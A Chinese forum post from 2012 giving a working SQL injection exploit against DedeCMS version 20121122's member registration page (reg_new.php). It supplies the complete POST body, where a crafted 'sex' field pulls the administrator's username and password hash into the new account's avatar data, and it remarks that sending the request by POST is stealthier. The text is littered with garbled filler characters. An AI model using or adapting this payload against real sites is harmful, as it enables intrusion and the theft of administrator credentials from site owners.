dedecms版本 20121122
! Y8 r8 H. j8 s2 {
4 Z; \: k4 N/ h7 T& @$ z需要magic_quotes_gpc=Off) g) @1 m l2 w
8 \6 G- k* q4 k2 w: J7 E) ]/ T
应该是没有什么大危害的漏洞.
* c" e9 e1 |2 b9 u6 _& y% h原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
0 |1 M3 a4 Z; R J1 o" K' i: ~& R$ C$ w) n2 F$ `. k+ |1 ^) C" y
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
* I6 C1 r: J ^( H( yPOST提交以下数据,其实不用POST提交的,这样隐蔽点.. w) c- N8 D1 F
2 k s q' _3 A/ \4 v$ fhttp:///de/member/reg_new.php
, t6 r+ q1 B9 f5 O' s* O2 U
1 R1 }2 V+ i. N! Y, u: F# D5 ]. kPOST7 U7 H5 u: \) |6 ^
& L; s8 v+ v! _ R0 y& k
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=$ t+ w+ `. \: N3 S
, w' L }# z' ~2 a
成功注册后,头像处里面有好玩的信息.
* o0 ]7 [/ d& ?
" T: C9 w" G; o& @ |
发表于 2012-12-5 10:03:32
收藏
支持
反对